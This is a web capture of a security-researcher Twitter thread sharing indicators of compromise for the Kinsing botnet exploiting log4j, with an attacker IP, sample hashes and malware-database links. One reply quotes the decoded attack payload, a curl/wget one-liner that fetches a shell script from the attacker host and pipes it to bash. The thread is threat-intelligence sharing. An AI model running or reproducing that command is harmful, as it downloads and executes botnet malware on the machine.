<!DOCTYPE html>
<html lang="en">
  <head>
    <link rel="stylesheet" type="text/css" href="/css/style.css?v=18" />
    <link rel="stylesheet" type="text/css" href="/css/fontello.css?v=2" />
    <link rel="stylesheet" type="text/css" href="/css/themes/nitter.css" />
    <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png" />
    <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png" />
    <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png" />
    <link rel="manifest" href="/site.webmanifest" />
    <link rel="mask-icon" href="/safari-pinned-tab.svg" color="#ff6c60" />
    <link rel="search" type="application/opensearchdescription+xml" title="nitter" href="https://nitter.net/opensearch" />
    <link rel="canonical" href="https://twitter.com/tolisec/status/1507854421618839564" />
    <title>Toli (@tolisec): &quot;#Kinsing botnet exploiting #log4j 
IoCs:
ldap&#x2F;web: 178[.]20[.]40[.]227
kinsing bin: https:&#x2F;&#x2F;bazaar.abuse.ch&#x2F;sample&#x2F;5d2530b809fd069f97b30a5938d471dd2145341b5793a70656aad6045445cf6d&#x2F;
curl-amd64:
6b9e23cb675be370a18a0c4482dc566be28920d4f1cd8ba6b4527f80acf978d3
libsystem .so: c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a&quot; | nitter</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta name="theme-color" content="#1F1F1F" />
    <meta property="og:type" content="photo" />
    <meta property="og:title" content="Toli (@tolisec)" />
    <meta property="og:description" content="#Kinsing botnet exploiting #log4j 
IoCs:
ldap/web: 178[.]20[.]40[.]227
kinsing bin: https://bazaar.abuse.ch/sample/5d2530b809fd069f97b30a5938d471dd2145341b5793a70656aad6045445cf6d/
curl-amd64:
6b9e23cb675be370a18a0c4482dc566be28920d4f1cd8ba6b4527f80acf978d3
libsystem .so: c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a" />
    <meta property="og:site_name" content="Nitter" />
    <meta property="og:locale" content="en_US" />
    <link rel="preload" type="image/png" href="/pic/media%2FFOz4KOpXIAAKulJ.jpg%3Fname%3Dsmall" as="image" />
    <meta property="og:image" content="https://nitter.net/pic/media%2FFOz4KOpXIAAKulJ.jpg" />
    <meta property="twitter:image:src" content="https://nitter.net/pic/media%2FFOz4KOpXIAAKulJ.jpg" />
    <meta property="twitter:card" content="summary_large_image" />
    <link rel="preload" type="font/woff2" as="font" href="/fonts/fontello.woff2?21002321" crossorigin="anonymous" />
  </head>
  <body>
    <nav><div class="inner-nav">
        <div class="nav-item"><a class="site-name" href="/">nitter</a></div>
        <a href="/"><img class="site-logo" src="/logo.png" alt="Logo" /></a>
        <div class="nav-item right">
          <div class="icon-container"><a class="icon-search" title="Search" href="/search"></a></div>
          <div class="icon-container"><a class="icon-bird" title="Open in Twitter" href="https://twitter.com/tolisec/status/1507854421618839564"></a></div>
          <a href="https://liberapay.com/zedeus"><svg class="lp" viewBox="0 0 40.6 52.3">
  <g transform="matrix(0.83,0,0,0.83,-158,-261)">
    <path d="m202.5,366c-3.1 0-5.5-0.4-7.3-1.2-1.8-0.8-3-1.9-3.8-3.3-0.8-1.4-1.1-3-1.1-4.8 0-1.8 0.3-3.7 0.8-5.8l8.3-34.8 10.2-1.6-9.1 37.8c-0.2 0.8-0.3 1.5-0.3 2.2 0 0.7 0.1 1.2 0.4 1.7 0.3 0.5 0.7 0.9 1.3 1.2 0.6 0.3 1.5 0.5 2.7 0.6l-2 8.1"/>
    <path d="m239.2 344.3c0 3.2-0.5 6.1-1.6 8.8-1 2.6-2.5 4.9-4.4 6.9-1.9 1.9-4.1 3.4-6.7 4.5-2.6 1.1-5.4 1.6-8.5 1.6-1.5 0-3-0.1-4.5-0.4l-3 11.9h-9.7l10.9-45.4c1.7-0.5 3.7-1 6-1.4 2.3-0.4 4.7-0.6 7.3-0.6 2.4 0 4.6 0.4 6.3 1.1 1.8 0.7 3.2 1.8 4.4 3 1.1 1.3 2 2.8 2.5 4.5 0.5 1.7 0.8 3.6 0.8 5.5m-23.8 13.4c0.7 0.2 1.7 0.3 2.8 0.3 1.7 0 3.3-0.3 4.7-1 1.4-0.6 2.6-1.5 3.6-2.7 1-1.1 1.7-2.5 2.3-4.1 0.5-1.6 0.8-3.4 0.8-5.3 0-1.9-0.4-3.5-1.2-4.8-0.8-1.3-2.3-2-4.3-2-1.4 0-2.7 0.1-3.9 0.4l-4.6 19.1"/>
  </g>
</svg>
</a>
          <div class="icon-container"><a class="icon-info" title="About" href="/about"></a></div>
          <div class="icon-container"><a class="icon-cog" title="Preferences" href="/settings?referer=%2Ftolisec%2Fstatus%2F1507854421618839564%23m"></a></div>
        </div>
      </div></nav>
    <div class="container"><div class="conversation">
        <div class="main-thread"><div id="m" class="main-tweet"><div class="timeline-item "><div class="tweet-body">
                <div><div class="tweet-header">
                    <a class="tweet-avatar" href="/tolisec"><img class="avatar round" src="/pic/profile_images%2F1269377768313303040%2FgAV1Y9r__bigger.jpg" alt="" /></a>
                    <div class="tweet-name-row">
                      <div class="fullname-and-username">
                        <a class="fullname" href="/tolisec" title="Toli">Toli</a>
                        <a class="username" href="/tolisec" title="@tolisec">@tolisec</a>
                      </div>
                      <span class="tweet-date"><a href="/tolisec/status/1507854421618839564#m" title="Mar 26, 2022 · 10:58 PM UTC">Mar 26</a></span>
                    </div>
                  </div></div>
                <div class="tweet-content media-body" dir="auto"><a href="/search?q=%23Kinsing">#Kinsing</a> botnet exploiting <a href="/search?q=%23log4j">#log4j</a> 
IoCs:
ldap/web: 178[.]20[.]40[.]227
kinsing bin: <a href="https://bazaar.abuse.ch/sample/5d2530b809fd069f97b30a5938d471dd2145341b5793a70656aad6045445cf6d/">bazaar.abuse.ch/sample/5d253…</a>
curl-amd64:
6b9e23cb675be370a18a0c4482dc566be28920d4f1cd8ba6b4527f80acf978d3
libsystem .so: c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a</div>
                <div class="attachments"><div class="gallery-row" style=""><div class="attachment image"><a class="still-image" href="/pic/media%2FFOz4KOpXIAAKulJ.jpg%3Fname%3Dorig" target="_blank"><img src="/pic/media%2FFOz4KOpXIAAKulJ.jpg%3Fname%3Dsmall" alt="" /></a></div></div></div>
                <p class="tweet-published">Mar 26, 2022 · 10:58 PM UTC</p>
                <div class="tweet-stats">
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-comment" title=""></span> 4</div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-retweet" title=""></span> 17</div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-quote" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-heart" title=""></span> 29</div></span>
                </div>
              </div></div></div></div>
        <div id="r" class="replies">
          <div class="reply thread thread-line"><div class="timeline-item thread-last ">
              <a class="tweet-link" href="/bad_packets/status/1507858899264688128#m"></a>
              <div class="tweet-body">
                <div><div class="tweet-header">
                    <a class="tweet-avatar" href="/bad_packets"><img class="avatar round" src="/pic/profile_images%2F1113668754141900801%2FFGltMfZ1_bigger.png" alt="" /></a>
                    <div class="tweet-name-row">
                      <div class="fullname-and-username">
                        <a class="fullname" href="/bad_packets" title="Bad Packets">Bad Packets<div class="icon-container"><span class="icon-ok verified-icon" title="Verified account"></span></div></a>
                        <a class="username" href="/bad_packets" title="@bad_packets">@bad_packets</a>
                      </div>
                      <span class="tweet-date"><a href="/bad_packets/status/1507858899264688128#m" title="Mar 26, 2022 · 11:15 PM UTC">Mar 26</a></span>
                    </div>
                  </div></div>
                <div class="replying-to">Replying to <a href="/tolisec">@tolisec</a> <a href="/ankit_anubhav">@ankit_anubhav</a> <a href="/0xrb">@0xrb</a> <a href="/malwrhunterteam">@malwrhunterteam</a></div>
                <div class="tweet-content media-body" dir="auto">CVE-2021-44228 exploit activity detected from 178.20.40.227 (🇷🇺) starting at 2022-03-26T19:59:01Z – lighting up all our honeypots since then.

Payload decodes to:
(curl -s 178.20.40.227/lh.sh||wget -q -O- 178.20.40.227/lh.sh)|bash

Saved archive:
<a href="https://pastebin.com/XvADaVRF">pastebin.com/XvADaVRF</a></div>
                <div class="card"><a class="card-container" href="https://pastebin.com/XvADaVRF"><div class="card-content-container"><div class="card-content">
                        <h2 class="card-title">Saved archive of http:&#x2F;&#x2F;178.20.40.227&#x2F;lh.sh - Pastebin.com</h2>
                        <p class="card-description">Pastebin.com is the number one paste tool since 2002. Pastebin is a website where you can store text online for a set period of time.</p>
                        <span class="card-destination">pastebin.com</span>
                      </div></div></a></div>
                <div class="tweet-stats">
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-comment" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-retweet" title=""></span> 1</div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-quote" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-heart" title=""></span> 5</div></span>
                </div>
              </div>
            </div></div>
          <div class="reply thread thread-line"><div class="timeline-item thread-last ">
              <a class="tweet-link" href="/ANeilan/status/1507866414631186433#m"></a>
              <div class="tweet-body">
                <div><div class="tweet-header">
                    <a class="tweet-avatar" href="/ANeilan"><img class="avatar round" src="/pic/profile_images%2F1499210833787858948%2FVGKmM_Lb_bigger.jpg" alt="" /></a>
                    <div class="tweet-name-row">
                      <div class="fullname-and-username">
                        <a class="fullname" href="/ANeilan" title="Alan Neilan">Alan Neilan</a>
                        <a class="username" href="/ANeilan" title="@ANeilan">@ANeilan</a>
                      </div>
                      <span class="tweet-date"><a href="/ANeilan/status/1507866414631186433#m" title="Mar 26, 2022 · 11:45 PM UTC">Mar 26</a></span>
                    </div>
                  </div></div>
                <div class="replying-to">Replying to <a href="/tolisec">@tolisec</a> <a href="/ankit_anubhav">@ankit_anubhav</a> <a href="/0xrb">@0xrb</a> <a href="/malwrhunterteam">@malwrhunterteam</a></div>
                <div class="tweet-content media-body" dir="auto">The bitbucket profile:
/bitbucket.org/eosakk11/</div>
                <div class="tweet-stats">
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-comment" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-retweet" title=""></span> 1</div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-quote" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-heart" title=""></span> 2</div></span>
                </div>
              </div>
            </div></div>
          <div class="reply thread thread-line"><div class="timeline-item thread-last ">
              <a class="tweet-link" href="/Gi7w0rm/status/1508010943506169858#m"></a>
              <div class="tweet-body">
                <div><div class="tweet-header">
                    <a class="tweet-avatar" href="/Gi7w0rm"><img class="avatar round" src="/pic/profile_images%2F1356195785453481984%2Fx0zEqJcg_bigger.jpg" alt="" /></a>
                    <div class="tweet-name-row">
                      <div class="fullname-and-username">
                        <a class="fullname" href="/Gi7w0rm" title="Gitworm">Gitworm</a>
                        <a class="username" href="/Gi7w0rm" title="@Gi7w0rm">@Gi7w0rm</a>
                      </div>
                      <span class="tweet-date"><a href="/Gi7w0rm/status/1508010943506169858#m" title="Mar 27, 2022 · 9:20 AM UTC">Mar 27</a></span>
                    </div>
                  </div></div>
                <div class="replying-to">Replying to <a href="/tolisec">@tolisec</a> <a href="/ankit_anubhav">@ankit_anubhav</a> <a href="/0xrb">@0xrb</a> <a href="/malwrhunterteam">@malwrhunterteam</a></div>
                <div class="tweet-content media-body" dir="auto"><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.kinsing">malpedia.caad.fkie.fraunhofe…</a>

Just adding this in case anybody wonders :)</div>
                <div class="tweet-stats">
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-comment" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-retweet" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-quote" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-heart" title=""></span> 2</div></span>
                </div>
              </div>
            </div></div>
          <div class="reply thread thread-line">
            <div class="timeline-item ">
              <a class="tweet-link" href="/timb_machine/status/1508049489004744708#m"></a>
              <div class="tweet-body">
                <div><div class="tweet-header">
                    <a class="tweet-avatar" href="/timb_machine"><img class="avatar round" src="/pic/profile_images%2F68168727%2F2007061702-debconf_bigger.jpg" alt="" /></a>
                    <div class="tweet-name-row">
                      <div class="fullname-and-username">
                        <a class="fullname" href="/timb_machine" title="Tim Brown">Tim Brown</a>
                        <a class="username" href="/timb_machine" title="@timb_machine">@timb_machine</a>
                      </div>
                      <span class="tweet-date"><a href="/timb_machine/status/1508049489004744708#m" title="Mar 27, 2022 · 11:53 AM UTC">Mar 27</a></span>
                    </div>
                  </div></div>
                <div class="replying-to">Replying to <a href="/tolisec">@tolisec</a> <a href="/Securityblog">@Securityblog</a> <a href="/ankit_anubhav">@ankit_anubhav</a> <a href="/0xrb">@0xrb</a> <a href="/malwrhunterteam">@malwrhunterteam</a></div>
                <div class="tweet-content media-body" dir="auto">Mm, Linux malware, my favourite.</div>
                <div class="tweet-stats">
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-comment" title=""></span> 1</div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-retweet" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-quote" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-heart" title=""></span> 1</div></span>
                </div>
              </div>
            </div>
            <div class="timeline-item ">
              <a class="tweet-link" href="/timb_machine/status/1508053745476804612#m"></a>
              <div class="tweet-body">
                <div><div class="tweet-header">
                    <a class="tweet-avatar" href="/timb_machine"><img class="avatar round" src="/pic/profile_images%2F68168727%2F2007061702-debconf_bigger.jpg" alt="" /></a>
                    <div class="tweet-name-row">
                      <div class="fullname-and-username">
                        <a class="fullname" href="/timb_machine" title="Tim Brown">Tim Brown</a>
                        <a class="username" href="/timb_machine" title="@timb_machine">@timb_machine</a>
                      </div>
                      <span class="tweet-date"><a href="/timb_machine/status/1508053745476804612#m" title="Mar 27, 2022 · 12:10 PM UTC">Mar 27</a></span>
                    </div>
                  </div></div>
                <div class="tweet-content media-body" dir="auto"><a href="/tolisec" title="Toli">@tolisec</a> You might enjoy the talks by <a href="/coolestcatiknow" title="Cat">@coolestcatiknow</a> and I at ATT&amp;CKCon - she's talking on what comes next for ATT&amp;CK for Linux and OS X and I'm covering a couple of real world examples of UNIX detection engineering</div>
                <div class="tweet-stats">
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-comment" title=""></span> 1</div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-retweet" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-quote" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-heart" title=""></span> 1</div></span>
                </div>
              </div>
            </div>
            <div class="timeline-item more-replies"><a class="more-replies-text" href="/timb_machine/status/1508053745476804612#m">more replies</a></div>
          </div>
        </div>
        <div class="top-ref"><div class="icon-container"><a class="icon-down" title="" href="#m"></a></div></div>
      </div></div>
  </body>
</html>